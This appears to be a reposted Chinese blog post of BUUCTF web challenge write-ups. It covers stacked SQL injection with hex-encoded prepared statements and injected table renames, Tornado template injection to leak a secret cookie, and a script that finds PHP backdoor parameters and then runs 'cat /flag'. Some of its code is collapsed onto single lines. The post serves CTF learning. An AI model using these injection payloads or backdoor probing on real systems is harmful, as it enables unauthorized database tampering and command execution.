【web】BUUCTF-web刷题记录

最新推荐文章于 2023-02-15 15:49:39 发布
最新推荐文章于 2023-02-15 15:49:39 发布
阅读量285 收藏 1
点赞数
文章标签: php python 数据库
原文链接:http://www.cnblogs.com/yichen115/p/11513171.html
版权

本来一题一篇文章,结果发现太浪费了,所以整合起来了,这篇博文就记录 BUUCTF 的  web 题目的题解吧!

 

随便注

 

随便输入一个单引号,报错

 

order by 3就不行了

 

尝试联合查询的时候出现提示:

"/select|update|delete|drop|insert|where|\./i"

 

一个正则可视化网站:https://regexper.com

 

 使用堆叠注入:1';show tables;#

 

看一下表里有什么列名:1';show columns from `1919810931114514`;#

(注意,字符串为表名的表操作时要加反引号)

 

但是没办法使用 select * from `1919810931114514`

看网上师傅们有两种方法,第一种:mysql 预定义语句

1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;Prepare execsql from @a;execute execsql;#

hex decode 以后是:?inject=1';SeT@a=select * from `1919810931114514`;Prepare execsql from @a;execute execsql;#

 

 

 

还有一种方法时是:改表名 这样查询的时候就可以查询到 flag

?inject=1';
rename tables `words` to `test`;rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#

 

意思分别是:把 words 表改名为 test,把 1919810931114541 改名为 words

把列名 flag 改为 id

 

这样在 1'; or 1=1# 查询的时候就会把所有的都列出来,这样就可以看到 flag 了

 

easy_tornado

 

打开看到有三个文件:

 

三个文件内容如下:

 

通过 url 知道,访问一个文件需要知道:filename 跟 filehash

 

企图直接访问是不行的,想到了 burp 抓包,但是抓了半天没抓到,看了网上的 wp 是 模版注入

 

tornado 是一个 python 的模板,welcome.txt 中的 render 是 python 中的一个渲染函数,

报错时候的 url 是这样的

 

尝试把后面换成:{{111}},输出了!

 

在 tornado 模板中,存在一些可以访问的快速对象,例如:

 <title>
     {{ escape(handler.settings["cookie"]) }}
 </title>

 

那么输入:{{handler.settings}}

 

拿到 cookie 就 OK 了!

import hashlib
def md5value(s):
    md5 = hashlib.md5() 
    md5.update(s) 
    return md5.hexdigest()
def jiami(): 
    filename = '/fllllllllllllag' cookie_s ="ea7d75de-4ca5-486a-a69c-e690f3a8c217" print(md5value(filename.encode('utf-8'))) x=md5value(filename.encode('utf-8')) y=cookie_s+xprint(md5value(y.encode('utf-8'))) jiami()

 

 

高明的黑客

 

访问提示源码在 www.tar.gz

 

在网址后面加上 www.tar.gz 是可以下载下来的

 

下下来里面超级多 php 文件,用大佬的 python 脚本筛选出来

import os,re
import requests
filenames = os.listdir('D:/anquan/localtest/PHPTutorial/WWW/CTFtraining/BUUCTF/src/')
pattern = re.compile(r"\$_[GEPOST]{3,4}\[.*\]")
for name in filenames:
    print(name) with open('D:/anquan/localtest/PHPTutorial/WWW/CTFtraining/BUUCTF/src/'+name,'r') as f: data = f.read() result = list(set(pattern.findall(data))) for ret in result: try: command = 'echo "got it"' flag = 'got it' # command = 'phpinfo();' # flag = 'phpinfo' if 'GET' in ret: passwd = re.findall(r"'(.*)'",ret)[0] r = requests.get(url='http://127.0.0.1/CTFtraining/BUUCTF/src/' + name + '?' + passwd + '='+ command) if "got it" in r.text: print('backdoor file is: ' + name) print('GET: ' + passwd) elif 'POST' in ret: passwd = re.findall(r"'(.*)'",ret)[0] r = requests.post(url='http://127.0.0.1/CTFtraining/BUUCTF/src/' + name,data={passwd:command}) if "got it" in r.text: print('backdoor file is: ' + name) print('POST: ' + passwd) except : pass

 

 我参考的网上的 wp 直接把 x 开头之前的 php 文件删掉了,不然要跑很长时间(php 版本要用 7 以上的)

 

访问 xk0SzyKwfzw.php?Efa5BVG= cat /flag 得到 flag

转载于:https://www.cnblogs.com/yichen115/p/11513171.html

weixin_30684743
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
【BUUCTFWeb方法总结(一)
Y1seco的博客
03-28 5013
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
BUUCTF_Web记录1
Altering_Ji的博客
07-11 2237
记录一下buu 网站上最近做的三道web目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF(web记录一)
nareku的博客
04-16 8506
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
BUUCTF-练习场-WEB-第一部分(8道)
weixin_45908624的博客
02-15 1917
BUUCTF-WEB 8道
记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 2042
BUUCTF Web
web-socket-js
12-19
web-socket-js亲测可用
WEB前端-案例汇总
11-08
WEB前端-案例汇总;史上最全的前端资源大汇总;适合初学者进阶,几乎涵盖前端开发所有案例。
spring-webmvc.jar
01-24
spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载
WebUI-4.23.zip
11-11
用於Web穿透開發的Unreal engine4 的插件,還能通過編寫html的js接口跟UE4相互通信傳輸數據。該插件庫有多個版本。
BUUCTF_Web记录2
Altering_Ji的博客
07-11 869
记录三道做过的buu CTF平台上的web类型目,[MRCTF2020]Ez_bypass、[极客大挑战 2019]BuyFlag、[MRCTF2020]你传你🐎呢,考点包括代码审计和文件上传等
buuctf解记录
qq_59235193的博客
10-29 901
buuctf记录
BUUCTF_Misc记录
Altering_Ji的博客
07-28 4560
BUU CTF平台 Misc分类目解记录,含六道:ningen、小明的保险箱、爱因斯坦、easycap、隐藏的钥匙、另外一个世界
BUUCTF记录——MISC部分解答(一)
u013119911的博客
08-18 6966
buuctf 解答
BUUCTF-Web-目详解(持续更新……)
AkangBoy的博客
12-11 4304
本文介绍BUUCTF平台上,web目的详解过程,持续更新
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 3万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
BUUCTF的Web学习整理(一)
CTF小白的博客
08-01 5011
目录WEB1—WarmUp (任意文件包含漏洞)WEB2—高明的黑客(fuzz脚本)WEB3—easy_tornado (服务端模板注入(ssti攻击))WEB4—Hack World(时间盲注)WEB5—admin(unicode欺骗)WEB6—piapiapia (一个源码中有防止sql注入的反序列化漏洞) BUU上的基本都是比赛真,还是很有借鉴意义的,安利一波https://buuoj...
ctf之WEB之后台登录
weixin_30340745的博客
06-02 1738
1、后台登录 格式:flag:{xxx} 解链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句: $sql = "SELECT * FROM admin WHERE username = 'admin' and password ...
webui-user.bat
最新发布
05-10
WebUI-User.bat是一个用于创建Deluge Web UI用户的批处理文件。Deluge是一个流行的开源BT客户端,具有方便易用的Web UI界面。WebUI-User.bat可以让用户快速创建一个具有登录和密码的Deluge Web UI用户,加强了Deluge...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值